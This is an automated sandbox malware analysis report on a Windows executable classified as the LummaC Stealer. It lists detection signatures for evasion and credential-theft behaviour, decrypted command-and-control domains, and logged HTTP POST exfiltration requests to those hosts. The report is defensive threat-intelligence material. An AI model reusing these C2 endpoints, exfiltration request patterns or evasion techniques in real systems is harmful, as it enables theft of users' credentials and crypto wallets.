Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YuQuLoader.exe

Overview

General Information

Sample name:YuQuLoader.exe
Analysis ID:1635448
MD5:849c830e2af83f171e9607e3d2e7f694
SHA1:760e86b28b8a76fd47a9a31b711b58480088b6aa
SHA256:350d0f5dba0941904595a2f132cc43af3d23a1a7aa6ee272b9dd0408d2b58022
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • YuQuLoader.exe (PID: 8608 cmdline: "C:\Users\user\Desktop\YuQuLoader.exe" MD5: 849C830E2AF83F171E9607E3D2E7F694)
    • conhost.exe (PID: 8616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YuQuLoader.exe (PID: 8668 cmdline: "C:\Users\user\Desktop\YuQuLoader.exe" MD5: 849C830E2AF83F171E9607E3D2E7F694)
    • WerFault.exe (PID: 8756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000003.1557692943.00000000015F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1557429661.0000000001640000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.YuQuLoader.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              2.2.YuQuLoader.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T17:23:27.701362+010020283713Unknown Traffic192.168.2.549711149.154.167.99443TCP
                2025-03-11T17:23:29.701106+010020283713Unknown Traffic192.168.2.549713104.21.93.43443TCP
                2025-03-11T17:23:32.032770+010020283713Unknown Traffic192.168.2.549714104.21.112.1443TCP
                2025-03-11T17:23:35.627519+010020283713Unknown Traffic192.168.2.549716104.21.112.1443TCP
                2025-03-11T17:23:38.809453+010020283713Unknown Traffic192.168.2.549717104.21.112.1443TCP
                2025-03-11T17:23:41.948508+010020283713Unknown Traffic192.168.2.549718104.21.112.1443TCP
                2025-03-11T17:23:46.175894+010020283713Unknown Traffic192.168.2.549721104.21.112.1443TCP
                2025-03-11T17:23:49.894407+010020283713Unknown Traffic192.168.2.549723104.21.112.1443TCP
                2025-03-11T17:23:55.565780+010020283713Unknown Traffic192.168.2.549725104.21.112.1443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://mrodularmall.top/aJAvira URL Cloud: Label: malware
                Source: https://mrodularmall.top:443/aNzSMicrosoftAvira URL Cloud: Label: malware
                Source: https://mrodularmall.top/aNzSAvira URL Cloud: Label: malware
                Source: https://mrodularmall.top/bAvira URL Cloud: Label: malware
                Source: https://mrodularmall.top/Avira URL Cloud: Label: malware
                Source: https://mrodularmall.top/aNzS33Avira URL Cloud: Label: malware
                Source: https://mrodularmall.top/aNzSrmalAvira URL Cloud: Label: malware
                Source: https://mrodularmall.top/aRAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: YuQuLoader.exeVirustotal: Detection: 41%Perma Link
                Source: YuQuLoader.exeReversingLabs: Detection: 39%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: astralconnec.icu/DPowko
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
                Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041CCB6 CryptUnprotectData,2_2_0041CCB6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041D7D2 CryptUnprotectData,CryptUnprotectData,2_2_0041D7D2
                Source: YuQuLoader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: YuQuLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B0F86F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B0F86F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B0F7BE FindFirstFileExW,0_2_00B0F7BE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B0F86F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B0F86F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B0F7BE FindFirstFileExW,2_2_00B0F7BE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edx+50h]2_2_0040F14B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [esi+eax*8], CA198B66h2_2_004479B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then push edi2_2_0041330A
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2Ch]2_2_0044D320
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi+02h]2_2_00429C40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h2_2_0044BC40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+10h]2_2_0040DC5A
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h2_2_00443D60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DF8h]2_2_00421E50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], A566C0CEh2_2_00421E50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7FFFFFFFh]2_2_0042FE10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-773910CCh]2_2_0042FE10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h2_2_0041D7D2
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0044CFE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]2_2_00443F90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]2_2_00443F90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-3C8EC9B8h]2_2_00411F95
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_00429050
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-6D3F2B30h]2_2_0044B060
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000011E8h]2_2_0042D070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004328D7
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000000E0h]2_2_004110E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041B880
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041B940
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-6D3F2B30h]2_2_0044B150
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h2_2_0044C1C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov edx, eax2_2_004491D4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh2_2_004019E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov esi, edx2_2_004261A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3B9108C6h]2_2_0042D201
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_0040A210
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_0040A210
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00427A20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]2_2_0040C2D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0040C2D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00433AD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000BCh]2_2_0040FAE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DECh]2_2_004482F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DECh]2_2_004482F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9F1F8F53h2_2_004482F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004412A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00423BF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0587871Ah]2_2_0040F380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-001A1106h]2_2_00430390
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DECh]2_2_00445420
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2Ch]2_2_0044D4A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+44h]2_2_00423D41
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00423D41
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-46h]2_2_00421530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [edi+eax+01h]2_2_004105E7
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h2_2_00447D90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov dword ptr [ebp-10h], esi2_2_00431E70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20h]2_2_0041E618
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+01h]2_2_0040BEC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx eax, byte ptr [edx]2_2_0042EEC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+69266341h]2_2_004336F6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then mov word ptr [ecx], si2_2_0041F6A9
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1A7D4DECh]2_2_00444F50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1A7D4DECh]2_2_00447FC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68h]2_2_004207F8
                Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.93.43:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 149.154.167.99:443
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: mrodularmall.top
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=53Oe3gS1MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14892Host: mrodularmall.top
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FZUWWktq31htFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15061Host: mrodularmall.top
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZljRRr7joE7LjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20550Host: mrodularmall.top
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=o38L1GPFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2460Host: mrodularmall.top
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=yGB1I56Y0NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587685Host: mrodularmall.top
                Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: mrodularmall.top
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: astralconnec.icu
                Source: global trafficDNS traffic detected: DNS query: featureccus.shop
                Source: global trafficDNS traffic detected: DNS query: mrodularmall.top
                Source: unknownHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: mrodularmall.top
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/
                Source: YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aJ
                Source: YuQuLoader.exe, 00000002.00000003.1681524125.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2282475400.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1514113776.0000000001671000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1513801004.0000000001670000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618247234.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557228002.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1481608033.0000000001670000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzS
                Source: YuQuLoader.exe, 00000002.00000002.2618436068.0000000001646000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681464391.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzS33
